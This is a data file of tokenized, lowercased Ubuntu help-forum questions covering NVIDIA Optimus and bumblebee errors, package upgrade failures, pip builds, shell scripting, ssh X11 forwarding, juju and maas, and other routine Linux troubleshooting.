484097	no devices found when trying to use nvidia gpu	i 'm attempting to use bumblebee for my nvidia gpu , and i 'm running into errors when running programs . i 'm testing it with a minecraft client , which actually starts , but crashes after a moment . $ primusrun java -jar minecraft.jar # some normal output ... primus : fatal : bumblebee daemon reported : error : [ xorg ] ( ee ) no devices detected . i can see the card just fine : $ lspci | grep 3d 01:00.0 3d controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) this setup ran fine under arch on this same machine . not sure what is n't configured properly . edit : $ lspci -nnk | grep -ia2 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 4th gen core processor integrated graphics controller [ 8086:0416 ] ( rev 06 ) subsystem : clevo/kapok computer device [ 1558:0650 ] kernel driver in use : i915 my main graphics card is intel , since this is an optimus machine . edit 2 : $ optirun -vv -- debug glxspheres [ 2643.983966 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 2643.984989 ] [ debug ] optirun version 3.2.1 starting ... [ 2643.985038 ] [ debug ] active configuration : [ 2643.985066 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 2643.985096 ] [ debug ] x display : :8 [ 2643.985123 ] [ debug ] ld_library_path : /usr/lib/nvidia-304 : /usr/lib32/nvidia-304 [ 2643.985152 ] [ debug ] socket path : /var/run/bumblebee.socket [ 2643.985179 ] [ debug ] accel/display bridge : auto [ 2643.985207 ] [ debug ] vgl compression : proxy [ 2643.985235 ] [ debug ] vglrun extra options : [ 2643.985262 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 2643.985525 ] [ debug ] using auto-detected bridge primus [ 2644.041849 ] [ info ] response : no - error : [ xorg ] ( ee ) no devices detected . [ 2644.041877 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 2644.041890 ] [ debug ] socket closed . [ 2644.041912 ] [ error ] aborting because fallback start is disabled . [ 2644.041923 ] [ debug ] killing all remaining processes . edit 3 : my /etc/bumblebee/xorg.conf.nvidia : section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . busid `` pci:01:00.0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection
484101	sudo apt-get upgrade - failure	this is a first for me . i 've been having trouble upgrading ubuntu 12.04 . how do i fix this ? sudo apt-get upgrade : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-image-3.8.0-42-generic ( 3.8.0-42.62~precise1 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.8.0-42-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-42-generic /boot/vmlinuz-3.8.0-42-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-42-generic /boot/vmlinuz-3.8.0-42-generic update-initramfs : generating /boot/initrd.img-3.8.0-42-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.8.0-42-generic with 1. run-parts : /etc/kernel/postinst.d/initramfs-tools exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-42-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-42-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic-lts-raring : linux-image-generic-lts-raring depends on linux-image-3.8.0-42-generic ; however : package linux-image-3.8.0-42-generic is not configured yet . dpkg : error processing linux-image-generic-lts-raring ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic-lts-raring : linux-generic-lts-raring depends on linux-image-generic-lts-raring ; however : package linux-image-generic-lts-raring is not configured yet . dpkg : error processing linux-generic-lts-raring ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.8.0-42-generic linux-image-generic-lts-raring linux-generic-lts-raring e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have over 2tb of space remaining on the hard drive . i do n't understand : gzip : stdout : no space left on device maxreports is reached already
484102	using the nvidia graphic card in ubuntu 12.04	i 'm new to ubuntu and i 've been having this question since the day i installed ubuntu . does ubuntu come along with the necessary drivers for my nvidia 640m graphic card ? also , my computer was overheating a few months back and i found out that the problem was with the nvidia optimus thing so i had to use bumblebee and disable the graphic card . so , everytime i need to use my gc , i type $ optirun applicationname and that enables my gc again . so , do i need to install my nvidia drivers for my graphic card and if yes , how ? any help is appreciated . thanks in advance ! : )
484105	sudo apt-get install < multiple packages > can not read packages	i am trying to setup ruby on rails on a new ubuntu machine . i want to install all the dependencies at once after a sudo apt-get update , but encountered errors saying the packages has no installation candidates . am i doing something wrong or missing something small ? sudo apt-get -- ignore-missing install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties reading package lists ... done building dependency tree reading state information ... done package libxslt1-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package build-essential is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package curl is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package libsqlite3-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package zlib1g-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package sqlite3 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'curl ' has no installation candidate e : package 'zlib1g-dev ' has no installation candidate e : package 'build-essential ' has no installation candidate e : unable to locate package libreadline-dev e : unable to locate package libyaml-dev e : package 'libsqlite3-dev ' has no installation candidate e : package 'sqlite3 ' has no installation candidate e : package 'libxslt1-dev ' has no installation candidate e : unable to locate package libcurl4-openssl-dev
484110	unable to install a package using pip	i 'm triying to install a package using pip inside a virtualenv : pip install fuse-python but the output is downloading/unpacking fuse-python downloading fuse-python-0.2.tar.gz ( 53kb ) : 53kb downloaded running setup.py ( path : /home/nicu/dev/bacula/ve/build/fuse-python/setup.py ) egg_info for package fuse-python usage : pkg-config [ - ? ] [ -- version ] [ -- modversion ] [ -- atleast-pkgconfig-version=version ] [ -- libs ] [ -- static ] [ -- short-errors ] [ -- libs-only-l ] [ -- libs-only-other ] [ -- libs-only-l ] [ -- cflags ] [ -- cflags-only-i ] [ -- cflags-only-other ] [ -- variable=name ] [ -- define-variable=name=value ] [ -- exists ] [ -- print-variables ] [ -- uninstalled ] [ -- atleast-version=version ] [ -- exact-version=version ] [ -- max-version=version ] [ -- list-all ] [ -- debug ] [ -- print-errors ] [ -- silence-errors ] [ -- errors-to-stdout ] [ -- print-provides ] [ -- print-requires ] [ -- print-requires-private ] [ - ? | -- help ] [ -- usage ] pkg-config could not find fuse : you might need to adjust pkg_config_path or your fuse installation is very old ( older than 2.1-pre1 ) traceback ( most recent call last ) : file `` < string > '' , line 17 , in < module > file `` /home/nicu/dev/bacula/ve/build/fuse-python/setup.py '' , line 69 , in < module > iflags = [ x [ 2 : ] for x in cflags.split ( ) if x [ 0:2 ] == '-i ' ] nameerror : name 'cflags ' is not defined complete output from command python setup.py egg_info : usage : pkg-config [ - ? ] [ -- version ] [ -- modversion ] [ -- atleast-pkgconfig-version=version ] [ -- libs ] [ -- static ] [ -- short-errors ] [ -- libs-only-l ] [ -- libs-only-other ] [ -- libs-only-l ] [ -- cflags ] [ -- cflags-only-i ] [ -- cflags-only-other ] [ -- variable=name ] [ -- define-variable=name=value ] [ -- exists ] [ -- print-variables ] [ -- uninstalled ] [ -- atleast-version=version ] [ -- exact-version=version ] [ -- max-version=version ] [ -- list-all ] [ -- debug ] [ -- print-errors ] [ -- silence-errors ] [ -- errors-to-stdout ] [ -- print-provides ] [ -- print-requires ] [ -- print-requires-private ] [ - ? | -- help ] [ -- usage ] pkg-config could not find fuse : you might need to adjust pkg_config_path or your fuse installation is very old ( older than 2.1-pre1 ) traceback ( most recent call last ) : file `` < string > '' , line 17 , in < module > file `` /home/nicu/dev/bacula/ve/build/fuse-python/setup.py '' , line 69 , in < module > iflags = [ x [ 2 : ] for x in cflags.split ( ) if x [ 0:2 ] == '-i ' ] nameerror : name 'cflags ' is not defined -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- cleaning up ... command python setup.py egg_info failed with error code 1 in /home/nicu/dev/bacula/ve/build/fuse-python storing debug log for failure in /home/nicu/.pip/pip.log as far as i can tell there 's something wrong with pkg-config and pkg_config_path i 'm running ubuntu 14.04 , and the output of dpkg -l | grep is ( so my fuse installation is not 'too old ' ) : ii fuse 2.9.2-4ubuntu4 amd64 filesystem in userspace ii gvfs-fuse 1.20.1-1ubuntu1 amd64 userspace virtual filesystem - fuse server ii ifuse 1.1.2-0.1 amd64 fuse module for iphone and ipod touch devices ii libfuse2 : amd64 2.9.2-4ubuntu4 amd64 filesystem in userspace ( library ) update : i installed it using sudo apt-get install python-fuse but that installed it globally : ii python-fuse 2:0.2.1-9 amd64 python bindings for fuse ( filesystems in userland )
484111	can i modify a bash script ( .sh ) file while it is running ?	suppose i have a script script.sh , which takes some time to execute . i execute it , ./script.sh . while it is running in a terminal window , i modify the file script.sh . will this have any effect on the already running process ? after modifying it , i execute the modified file , so i have two running process now . is this okay ?
484112	what language is this file written in and which plotting program can graph it ?	edit i managed to open the below file with grace in the end , but i would like to know what `` language '' its written in and what other plotting programs read this language . thank you ps i am brand new to linux just installed ubuntu 14.04 lts . @ version 50109 @ default linewidth 1.5 @ g0 on @ with g0 @ world xmin 0.00 @ world xmax 754.92 @ world ymin -0.25 @ world ymax 2.50 @ view xmin 0.150000 @ view xmax 0.602214 @ view ymin 0.150000 @ view ymax 0.850000 @ xaxis bar linewidth 1.5 @ xaxis tick major linewidth 1.5 @ xaxis tick minor linewidth 1.5 @ xaxis tick major 136 @ xaxis label `` cutoff energy ( ev ) '' @ yaxis bar linewidth 1.5 @ yaxis tick major linewidth 1.5 @ yaxis tick minor linewidth 1.5 @ yaxis tick major 1.0000 @ yaxis label `` energy error ( ev/atom ) '' @ g1 on @ with g1 @ world xmin 0.00 @ world xmax 754.92 @ world ymin -4.00 @ world ymax 1.00 @ view xmin 0.717657 @ view xmax 1.169872 @ view ymin 0.150000 @ view ymax 0.850000 @ xaxis tick major 136 @ xaxis label `` cutoff energy ( ev ) '' @ yaxis label `` log10 |energy error| ( ev/atom ) '' @ target g0.s0 @ type xy 53.9491654150072 16.5784258405490 108.459781227830 1.37706700787840 162.989051467077 3.431021246137789e-002 216.282381168537 1.945370131102209e-002 264.211994723891 7.044388309623173e-003 316.934569634781 1.883579609511798e-003 374.450105901206 1.072583647783176e-003 420.610728941616 7.798143890340725e-004 486.513947975269 5.595554691808502e-004 539.208152497737 3.921376373909879e-004 594.355578932754 2.913218597768719e-004 652.441864522262 1.875952541467996e-004 692.582915874872 1.474738464821712e-004 754.919784783225 1.057575141203415e-004 & @ target g0.s1 @ type xy 0.000000000000000e+000 2.00000000000000 754.919784783225 2.00000000000000 & @ target g0.s2 @ type xy 0.000000000000000e+000 0.300000000000000 754.919784783225 0.300000000000000 & @ target g0.s3 @ type xy 0.000000000000000e+000 0.100000000000000 754.919784783225 0.100000000000000 & @ target g0.s4 @ type xy 0.000000000000000e+000 1.000000000000000e-002 754.919784783225 1.000000000000000e-002 & @ target g1.s0 @ type xy 53.9491654150072 1.21954329091756 108.459781227830 0.138955073476815 162.989051467077 -1.46457659262531 216.282381168537 -1.71099775649645 264.211994723891 -2.15215671231883 316.934569634781 -2.72501601961201 374.450105901206 -2.96956882841683 420.610728941616 -3.10800875552859 486.513947975269 -3.25215685504253 539.208152497737 -3.40656147209213 594.355578932754 -3.53562692620556 652.441864522262 -3.72677815275828 692.582915874872 -3.83128499213042 754.919784783225 -3.97568876603266 & @ target g1.s1 @ type xy 0.000000000000000e+000 0.301029995663981 754.919784783225 0.301029995663981 & @ target g1.s2 @ type xy 0.000000000000000e+000 -0.522878745280338 754.919784783225 -0.522878745280338 & @ target g1.s3 @ type xy 0.000000000000000e+000 -1.00000000000000 754.919784783225 -1.00000000000000 & @ target g1.s4 @ type xy 0.000000000000000e+000 -2.00000000000000 754.919784783225 -2.00000000000000 &
484114	ec2 : should i restart when i get a `` *** system restart required *** '' ?	when i log into my machines after an apt-get upgrades , i often get this message : system load : 0.06 processes : 86 usage of / : 28.3 % of 7.75gb users logged in : 0 memory usage : 6 % ip address for eth0 : 172.31.41.38 swap usage : 0 % graph this data and manage this system at : https : //landscape.canonical.com/ get cloud support with ubuntu advantage cloud guest : http : //www.ubuntu.com/business/services/cloud *** system restart required *** obviously , restarting a production server is not something i 'm keen to do very often . why is *** system restart required *** ? what risks do i take if i do n't restart it ?
484115	ec2 : are frequent apt-get upgrades a good idea ?	in my ubuntu desktop , i often run : sudo apt-get update & & sudo apt-get upgrade & & sudo apt-get autoremove to keep my machine updated . is this a good idea in an ec2 production server , which runs python server using uwsgi and nginx ? frequent upgrades make changes to the kernel , which in turn requires restarts , and i already have unattended-upgrades installed .
484120	ubuntu 10.04 compatibility	has anybody installed ubuntu 10.04 lts ( server edition ) on newer laptops ? i am trying to install on hp8570w but it fails to complete network configuration as it neither recognizes the ethernet nor the wlan card . is it a compatibility issue with the pci version ?
484122	no sound into headphones	i will make it quick : i have no sound in my headphones when they are plugged in on my asus f200ca running ubuntu 14.04 , but : i have sound in the laptop speakers when the headphones are plugged out . if i boot up my laptop on a live usb running ubuntu 14.04 , i have sound in the speakers and in the headphones . if i open pavucontrol , i can `` see '' sound , but i ca n't hear it . i already did some of the actions listed here . i 'm running ubuntu 14.04 , with unity , and this bug appeared about a week ago .
484123	ubuntu 14.04 . lost wired connection and will not connect wireless , lost nm-applet and laptop will not shut down , now lost cd rom connection	i have been using ubuntu 10.04 for a couple of years and i am new to ubuntu terminal . i performed my first ubuntu os installation a couple of weeks . 14.04 it is now my 4th installation because while i have fixed one thing , i have broken another . first i was not able to connect to my wireless access point . now i can not connect using a wired , or a wireless connection . i also managed to lose the nm-applet , and my laptop will not shut down unless i hold down the power key . i was able to establish a connection using an wireless external usb . i also have access to a desktop to perform all checks . i am loving the learning curve and ubuntu , however now require some help to see what i have done as i have spent endless nights troubleshooting with no success . my laptop is a hp dv6700 running ubuntu 14.04 . just to add after performing an upgrade i have also lost my cd rom . so i cant even do a re install . my start up disk creator does n't seem to be functioning either . i am not giving up . please help
484127	how to change font in arista transcoder ?	arista transcoder is a great simple tool to burn subtitles into videos but i could not figure out how to change the font and possibly size and background of the subtitle . appreciate your help .
484128	ca n't launch google chrome in ubuntu 14.04	i have installed the 14.04 lts in clean . then i use wget the chrome.deb for 64 bit from google and dpkg -i *.deb to install the chrome in my ubuntu 14.04 , however i ca n't launch it and get errors as below , could you please help me to solve this problem ? $ google-chrome [ 2697:2697:0616/211443 : error : process_singleton_linux.cc ( 394 ) ] readlink failed : no authority [ 2697:2697:0616/211443 : error : process_singleton_linux.cc ( 240 ) ] readlink ( /home/frank/.config/google-chrome/singletonlock ) failed : no authority [ 2697:2697:0616/211443 : error : process_singleton_linux.cc ( 240 ) ] readlink ( /home/frank/.config/google-chrome/singletonlock ) failed : no authority [ 2697:2697:0616/211443 : error : process_singleton_linux.cc ( 264 ) ] failed to create /home/frank/.config/google-chrome/singletonlock : no authority [ 2697:2697:0616/211443 : error : process_singleton_linux.cc ( 394 ) ] readlink failed : no authority [ 2697:2697:0616/211443 : error : process_singleton_linux.cc ( 240 ) ] readlink ( /home/frank/.config/google-chrome/singletonlock ) failed : no authority [ 2697:2697:0616/211443 : error : chrome_browser_main.cc ( 1209 ) ] failed to create a processsingleton for your profile directory . this means that running multiple instances would start multiple browser processes rather than opening a new window in the existing process . aborting now to avoid profile corruption .
484130	configuration management and shared files with laptops	i have a kubuntu laptop which is my primary computer ( me-x220 ) . i also have an older desktop ( me-aspire ) that my girlfriend uses , but which i administrate . she has a tower ( her-medion ) and a wm ( her-vm ) on her laptop . there is another 2004 laptop ( me-vaio ) . so we have 5 ubuntu machines which currently all run the 14.04 lts version . i have written an rsync script to mirror the data from me-x220 to me-aspire , she uses dropbox to move her data from her-vm to her-aspire and her-tower . the user accounts are all set up individually on the computers and they have nothing in common , really . a couple of days ago , i set up htcondor , a cluster queue management system , on me-x220 for local use only . i thought about extending this to the other computers , but that requires unified users and a shared file system across all the machines . having heard of configuration management and programs like chef and puppet , i am thinking about setting up something for the network here at home . as far as i see it , that would require one server to be running all the time , or at least whenever any other computer is running . me-x220 is mostly running , does not consume too much power , but can be out of the house sometimes . having another tower powered up to run the laptop appears like a waste of energy to me . then i thought about buying a raspberry pi to have a server that only consumes a few watts , which would be okay . so what i might want to do : files on all machines central backup cache of package updates computing pool with htcondor or similar same users on all machines basically i think about sitting at any computer , logging in and having the exact same configuration . i am still unsure whether it makes sense to use a shared networked file system for all the computers when our two primaries are actually laptops . are there any sensible options , or should we just continue to have the computers decoupled ?
484131	sound and webcam does n't work on easynote mx-45 with ubuntu 14.04 lts	i 've installed the last lts ubuntu distribution on my easynote mx-45 laptop and there are at least two devices that do n't work properly : sound card webcam i 've tried compiling the last drivers for the webcam : stk11xx-2.1.0 but this is the output when i execute the command : $ make -f makefile.standalone make -c /lib/modules/3.13.0-29-generic/build subdirs=/home/sarao/descargas/stk11xx-2.1.0 modules make [ 1 ] : se ingresa al directorio «/usr/src/linux-headers-3.13.0-29-generic» cc [ m ] /home/sarao/descargas/stk11xx-2.1.0/stk11xx-usb.o /home/sarao/descargas/stk11xx-2.1.0/stk11xx-usb.c : in function ‘usb_stk11xx_probe’ : /home/sarao/descargas/stk11xx-2.1.0/stk11xx-usb.c:793:2 : error : implicit declaration of function ‘init_mutex’ [ -werror=implicit-function-declaration ] init_mutex ( & dev- > mutex ) ; cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/sarao/descargas/stk11xx-2.1.0/stk11xx-usb.o ] error 1 make [ 1 ] : *** [ _module_/home/sarao/descargas/stk11xx-2.1.0 ] error 2 make [ 1 ] : se sale del directorio «/usr/src/linux-headers-3.13.0-29-generic» make : *** [ driver ] error 2 i already installed the build-essential and the linux-headers .
484132	trying to install ubuntu 14.04 , monitor says mode unsupported/out of range	monitor says mode unsupported/out of range during installation of ubuntu 14.04 and never boots to the ubuntu desktop .
484134	ca n't extract files to my usr/share/themes folder	so i just upgraded to ubuntu 14.04 last night and now i ca n't seem to extract themes ( or icons for that matter ) to my usr/share/themes or usr/share/icons folders like i was able to without issue with 12.04 . it says i do not have permission . what can i do ? it says : extraction not performed you do not have the right permissions to extract in the folder `` themes ''
484136	shell scripting function question	i have this code snippet i am working on for a small project i am doing : echo `` please enter suid : `` ; read $ uid uid_assoc ( ) { arg1= $ 1 echo $ 1 ; } uid_assoc now to start , i would like this to prompt for a string and read the string . from there i would like to pass that string as an argument and echo it out . but i am not sure how to pass the string off as a parameter . when i attempt to do something like : uid_assoc ( $ uid ) it throws a syntax error ( i figured that would be incorrect anyways ) . are there any suggestions on how to do this ? update : i also tried re-arranging the code a bit to look like this : function uid_assoc ( ) { arg1= $ 1 echo $ 1 ; } echo `` please enter suid : `` ; read $ uid uid_assoc $ uid but that did n't seem to work either .
484138	zsh typing problem	i just installed zsh and wrote my own prompt thing so i have custom prompt . i also use emacs formatting in ~/.zshrc which says bindkey -e. now when i open the shell , for some reason , it acts very weird . for example if i just type cd do + tab i get this : another example , i am in downloads/guns n ' roses - 1988 - g n ' r lies directory and i want to write pwd . after i type letter w everything disappears and cursor goes to beginning of next line . end result i get working directory , but it looks like this ( keep in mind i typed pwd ) : this particular case does not happen when i am in shorter directory like home . what is going on here ? is it has to do with the way i wrote my prompt , or it 's just emacs typing works ? this is my prompt code in : ~/.zshrc : `prompt= '' % { $ fg [ red ] % } % n % { $ reset_color % } @ % { $ fg [ blue ] % } % m $ fg [ black ] | $ fg [ green ] % * % { $ fg [ yellow ] % } % 1~ % { $ reset_color % } % ``
484140	installation hanging on black screen	i tried to install ubuntu over a year ago and was almost able to get it right , aside from my ati graphics card . well , 4 months ago i bought a new nvidia graphics card and thought i 'd give ubuntu another try . unfortunately , ubuntu has it out for me . i 've used both cd and usb flash drive , and i had the same issue with both . once i restart and prepare to install ubuntu it takes me to an orange and yellow gradient screen and then , shortly after it takes me to a black screen with a blinking underline character at the very top . i left the computer for over 4 hours last night and came back to find that it was still stuck on this black screen . i 'm currently running two hard drives : one has 1tb and the other is 177gb . my specs are as follows : intel i5 2500k 3.3ghz quad core evga nvidia gtx 750ti 2gb vram 8gb dual channel ram biostar h61mh any help in fixing this issue is most appreciated .
484141	install ms fonts for xvfb-run in ubuntu 14.04 server	i have a cron which runs and takes a screenshot of a specific url . the job is : xvfb-run -- server-args= '' -screen 0 , 1024x768x24 '' /usr/bin/cutycapt -- min-width=1200 -- min-height=1200 -- delay=1000 -- url=http : //themer.mydomain.co.uk/_sh.php ? id=1 -- out=/home/www/mydomain/co.uk/themer/1.png this runs and stores the screenshot fine , and when using webfonts provided from google they load properly . but when we are using fonts from ms like perpetua it does n't render the font , just a fallback font . so i gathered i needed to install the fonts , but this is where i am getting stuck , i made a folder called myfonts inside /usr/share/fonts/truetype/ then i uploaded all my .ttf fonts from my windows fonts folder . i run sudo fc-cache -vf /usr/share/fonts : caching , new cache contents : 0 fonts , 4 dirs ... . /usr/share/fonts/truetype/myfonts : caching , new cache contents : 1083 fonts , 0 dirs ... . fc-cache : succeeded i reboot ubuntu and try generate the screenshot again but it does not use the fonts . so reading around i thought perhaps i need to install the fonts into the x11 directory , so i do the same process inside the x11 directory but it still will not use the fonts does anyone have any idea what i could try next ? **update** i 've done some more research , i done : mkfontdir /path/to/fonts/folder mkfontscale /path/to/fonts/folder which has created a .dir and .scale file but this still does not use the fonts
484150	ec2 ubuntu access requesting password after ssh update	i was trying to set up an sftp account and one of the forums suggessted that we comment out pam access . i now think that is how the user ubuntu has access and so i can no longer access my ec2 instance as ubuntu as its asking for a password now . how do i regain access to my sshd file to revert back ?
484152	windows 8.1 erased after updating to ubuntu 14.04	so i updated ubuntu 13.10 to ubuntu 14.04 from live usb . i formatted ubuntu and installed new version . but my windows 8.1 is gone now , gparted does not show any windows partitions.. i am very positive that i 've done 'install ubuntu alongside windows ' . is it possible that this happened , or i for some reason accidentally pressed format windows and install ubuntu ( very very unlikely ) ?
484159	understanding the at-command to schedule another command	i use cron to schedule things in linux , but recently i discovered the `` at '' command . sudo apt-get install at i do n't understand the scope from which this command operates : how would you schedule a command with at , that normally requires admin privileges ? what is the working directory ( pwd ) of a command scheduled with at ? additionally , everything i 've tried so far , did n't achieve what i was trying to do . for example , i tried to launch gedit one minute from now : echo `` gedit '' | at now + 1 minute i waited a minute , and nothing happened . i tried to turn off my monitor one minute from now : echo `` xset dpms force off '' | at now + 1 minute i waited a minute and nothing happened . if i ca n't get `` at '' to reliably perform a task one minute from now , how can i be certain that it will perform something i tell it to do tomorrow and beyond ? what am i missing here ?
484162	copy/paste from firefox to terminal ( urxvt )	i 'm having a curious issue copying text from web pages to my terminal ( to copy and paste a command for instance ) . ctrl-c/ctrl-v have never worked with the terminal since there are the two separate buffers . however , when i highlighted text , it was automatically added to some buffer from which i can paste onto the terminal ( with middle-click or shift+insert ) . this does n't work anymore . interestingly , however , it does work from the firefox addressbar . so i can ctrl-c text from a webpage , paste it using ctrl-v onto my address bar , and from there the highlight/ctrl-insert works again . edit : ah i 've found the issue . firefox clipboard.autocopy setting was off . i believe i turned it off some days/weeks ago in order to prevent the issue where firefox seems to go back when you middle-click . that is controlled by middlemouse.contentloadurl but i think i turned off both .
484165	can not use visual mode gui through ssh -xy < ip_address >	i am using ubuntu 12.04 , and i am trying to ssh to log into a remote server which is also running ubuntu 12.04 . i am using `` ssh -x `` . i can log into the remote server smoothly , but can not use the visual/graphical mode to open an application with gui . i think the problem lies in this server itself . because i can use `` ssh -x '' to run gui when connecting to another remote server . but i am not sure how to configure it to make it work . echo $ display returns blank . using grep x11 on /etc/ssh/sshd_config file returns : â ~ cat /etc/ssh/sshd_config | grep x11 x11forwarding yes x11displayoffset 10 x11uselocalhost no i have read the following posts , but the problem is still unsolved , gedit `` can not open display '' , on remote computer , using ssh - ubuntu 12.04 problem with x can not open display while ssh from ubuntu 13.04 to centos servers hope to get help from you . thank you very much !
484166	machines required juju bootstrap	root @ ubuntu : ~ # juju status environment : maas machines : `` 0 '' : agent-state : started agent-version : 1.18.4.1 dns-name : bld15-a4.maas instance-id : /maas/api/1.0/nodes/node-7e161bda-f351-11e3-970e-f274b29c2565/ series : precise `` 1 '' : agent-state : pending dns-name : bld02-a4.maas instance-id : manual : bld02-a4.maas life : dying series : precise hardware : arch=amd64 cpu-cores=16 mem=80521m services : { } ` i have 5 nodes in maas environment do i need to manually bootstrap the other 4 machines via juju . by default if i run juju bootstrap it only install agent in one machine ; and if i manually bootstrap machine id 1 - 4 then do i have to manually assign the machine id when i deploy juju charm ?
484168	unable to access 2 drives	one of my drives in windows 8 is not being showed in `` trying ubuntu '' and another is shown but i ca n't access it , its showing following error message error mounting /dev/sda6 at /media/ubuntu/enter10ment : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda6 '' `` /media/ubuntu/enter10ment '' ' exited with non-zero exit status 12 : failed to read last sector ( 498192383 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sda6 ' : invalid argument the device '/dev/sda6 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? please help i have never used ubuntu before
484173	skype connectivity issues on ubuntu 13.10 x64	i went through almost every skype-related thread here and google . i am running ubuntu 13.10 x64 on hp pavilion 15-b107eo . although i managed to properly ( i guess ) install skype , i face connectivity issues . although my connection is a bit unstable ( mobile broadband ) my connection drops regularly when i am on video call . calling back again as soon as it reconnects does n't work since it can not establish a new call or i get strange noises when i manage to reach the other person . so my only solution is to close skype and start it again . although my connection is unreliable , i did n't have such issues with my previous os ( windows 8 ) and only happens when on skype video call . sometimes i get the apport window to report the problem but i do n't have the crash report line at hand . any suggestions ? thanks in advance , greg
484180	regular expression	i have a code that is looking for a specific pattern in my log files . usually it begins with association id = ( this is what i am looking for in parenthesis ) . now the code i have made so far is throwing a syntax : echo `` please enter the uid : `` ; read uid uidassoc ( ) { arg1= $ 1 echo $ arg1 for arg1 in $ ( cat ~/jlog/server.log ) ; do echo $ word ; done | sed 's/.associationid = \ ( [ * ] ) \' } uidassoc $ uid can anyone throw suggestions as to how to correct the sed command and have it echo out the results found using it ? i have tried utilizing grep instead : echo `` please enter the uid : `` ; read uid # will parse through server log files for associaton uidassoc ( ) { arg1= $ 1 echo $ arg1 for arg1 in $ ( cat ~/jlog/server.log ) ; do echo $ word ; done| grep association id ~/jlog/server.log | grep -e -o `` [ a-z0-9 ] '' ~/jlog/server.log } uidassoc $ uid exit here is my input : please enter the uid : 1.2.124.113532.80.22187.2757.20140503.123509.1190654364 and for output : l e o p i c g e n t e a n r o c e s s e d i n s t a n c e 1 2 1 2 4 1 1 3 5 3 2 8 0 2 2 1 8 7 2 7
484182	how to make a bootable iso from a bootable dvd using the command line ?	i need to create an image to be able to mount the install dvd inside virtualbox in order to boot and install windows . important : i need to do it using the command line . i tried with genisoimage as suggested here and created an image using the command below but it turned out not bootable ... genisoimage -r -j -o cd_image.iso /cdrom what i need is to rip my original bootable dvd into a bootable image that i can mount in virtualbox . so i thought i would ask how to a ) convert that iso file into a bootable one or b ) re-create the iso making it bootable with genisoimage or other command .
484183	apache , django and mod_wsgi	i 'm using ubuntu 12.04 and trying to configure my apache server with django . i tried a couple of different online tutorials and keep on getting errors . this is my latest error when i try to start my server : * starting web server apache2 apache2 : syntax error on line 214 of /etc/apache2/apache2.conf : syntax error on line 2 of /etc/apache2/httpd.conf : can not load /etc/apache2/modules/mod_wsgi.so into server : /etc/apache2/modules/mod_wsgi.so : can not open shared object file : no such file or directory action 'start ' failed . the apache error log may have more information . [ fail ] any help would be appreciated .
484184	how to add themes 14.04	i am running 14.04 and using unity-tweak-tool i downloaded gtk2-engines-cleanice it is not showing up in tweaks or in settings appearance i want to add and change the themes from radiance to some other preferably blue colored theme
